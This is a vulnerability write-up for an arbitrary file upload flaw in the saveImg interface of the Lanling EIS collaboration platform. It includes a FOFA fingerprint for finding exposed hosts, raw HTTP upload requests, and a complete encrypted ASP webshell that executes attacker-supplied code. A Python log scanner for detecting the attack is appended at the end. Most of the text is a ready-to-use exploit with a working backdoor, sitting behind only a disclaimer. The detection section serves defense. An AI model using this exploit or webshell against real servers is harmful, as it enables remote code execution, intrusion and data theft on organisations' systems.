There is an arbitrary file upload vulnerability in the saveImg interface of Lanling EIS smart collaboration platform
Disclaimer: Please do not use the techniques in this article for illegal testing. Any direct or indirect consequences and losses caused by spreading or using the information or tools provided in this article are the sole responsibility of the user; any adverse consequences have nothing to do with the author of the article. This article is for educational purposes only.
1. Introduction to Lanling EIS
Lanling Smart Collaboration Platform EIS integrates a rich set of modules to meet the needs of organizations and enterprises in knowledge management, collaboration, project management, system construction and other areas.
2. Vulnerability description
Lanling Intelligent Collaboration Platform EIS integrates a rich set of modules to meet the needs of organizations and enterprises in knowledge management, collaboration, project management, system construction and other areas. The platform's saveImg interface contains an arbitrary file upload vulnerability: the uploaded filename's extension is not restricted, so a webshell can be uploaded through it.
3. Affected versions
Lanling Intelligent Collaboration Platform EIS
4. FOFA query
icon_hash="953405444"
5. Recurrence of vulnerabilities
Vulnerability link: http://127.0.0.1/eis/service/api.aspx?action=saveImg
Vulnerability packet:
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Length: 179
Content-Type: multipart/form-data; boundary=25c172e79b2758a7d7ff9fe9cab4a76d
--25c172e79b2758a7d7ff9fe9cab4a76d
Content-Disposition: form-data; name="file"; filename="50514.asp"
Content-Type: text/html
578321995
--25c172e79b2758a7d7ff9fe9cab4a76d--
After sending the request above, the server responds with the path of the uploaded file.
Full URL of the uploaded file (response path joined to the host): http://127.0.0.1/files/editor_img/20231019212439970030/20231019212439970030.asp
Burp request (webshell upload):
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=25c172e79b2758a7d7ff9fe9cab4a76d
Content-Length: 1950
--25c172e79b2758a7d7ff9fe9cab4a76d
Content-Disposition: form-data; name="file"; filename="50514.asp"
Content-Type: text/html
<%
Set bypassDictionary = Server.CreateObject("Scripting.Dictionary")
Function Base64Decode(ByVal vCode)
Dim oXML, oNode
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Base64Decode = oNode.nodeTypedValue
Set oNode = Nothing
Set oXML = Nothing
End Function
Function decryption(content,isBin)
dim size,i,result,keySize
keySize = len(key)
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.CharSet = "iso-8859-1"
BinaryStream.Type = 2
BinaryStream.Open
if IsArray(content) then
size=UBound(content)+1
For i=1 To size
BinaryStream.WriteText chrw(ascb(midb(content,i,1)) Xor Asc(Mid(key,(i mod keySize)+1,1)))
Next
end if
BinaryStream.Position = 0
if isBin then
BinaryStream.Type = 1
decryption=BinaryStream.Read()
else
decryption=BinaryStream.ReadText()
end if
End Function
key="3c6e0b8a9c15224a"
content=request.Form("123456")
if not IsEmpty(content) then
if IsEmpty(Session("payload")) then
content=decryption(Base64Decode(content),false)
Session("payload")=content
response.End
else
content=decryption(Base64Decode(content),true)
bypassDictionary.Add "payload",Session("payload")
Execute(bypassDictionary("payload"))
result=run(content)
response.Write("ca0be7")
if not IsEmpty(result) then
response.Write Base64Encode(decryption(result,true))
end if
response.Write("2d6353")
end if
end if
%>
--25c172e79b2758a7d7ff9fe9cab4a76d--
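For detection, the two observable artifacts of the write-up above are the POST to api.aspx?action=saveImg and a server-side script extension being served from /files/editor_img/. The following added example (not from the original post) scans constructed IIS W3C log lines for both; the field layout and sample addresses are assumptions.

```python
import posixpath
from urllib.parse import parse_qs

# Constructed IIS W3C sample log (assumed field layout; not from the original post).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2023-10-19 21:24:30 10.0.0.5 GET /eis/login.aspx - 80 10.0.0.9 200
2023-10-19 21:24:39 10.0.0.5 POST /eis/service/api.aspx action=saveImg 80 10.0.0.9 200
2023-10-19 21:24:41 10.0.0.5 GET /files/editor_img/20231019212439970030/20231019212439970030.asp - 80 10.0.0.9 200
2023-10-19 21:25:02 10.0.0.5 POST /files/editor_img/20231019212439970030/20231019212439970030.asp - 80 10.0.0.9 200
2023-10-19 21:26:10 10.0.0.5 GET /files/editor_img/20231019212600123456/20231019212600123456.png - 80 10.0.0.12 200
"""

# Server-side script extensions that should never be served from an image upload directory.
SCRIPT_EXTS = {".asp", ".aspx", ".asa", ".ashx", ".asmx"}
UPLOAD_DIR = "/files/editor_img/"
SAVEIMG_STEM = "/eis/service/api.aspx"

def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = []
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw or raw.startswith("#"):
            continue
        parts = raw.split()
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))

def is_saveimg_post(rec):
    """POST to api.aspx with action=saveImg: the upload endpoint named in the write-up."""
    query = parse_qs(rec["cs-uri-query"]) if rec["cs-uri-query"] != "-" else {}
    return (rec["cs-method"].upper() == "POST"
            and rec["cs-uri-stem"].lower() == SAVEIMG_STEM
            and "saveImg" in query.get("action", []))

def is_script_in_upload_dir(rec):
    """Any request for a script extension under editor_img: an uploaded script being reached."""
    stem = rec["cs-uri-stem"].lower()
    return stem.startswith(UPLOAD_DIR) and posixpath.splitext(stem)[1] in SCRIPT_EXTS

def scan(text):
    """Return (reason, client ip, uri stem) for every suspicious record, in log order."""
    hits = []
    for rec in parse_w3c(text):
        if is_saveimg_post(rec):
            hits.append(("saveImg upload", rec["c-ip"], rec["cs-uri-stem"]))
        elif is_script_in_upload_dir(rec):
            hits.append(("script under upload dir", rec["c-ip"], rec["cs-uri-stem"]))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

Correlating the two hit kinds by client IP, as the sample shows for 10.0.0.9, separates a real upload-then-execute sequence from a stray scanner request.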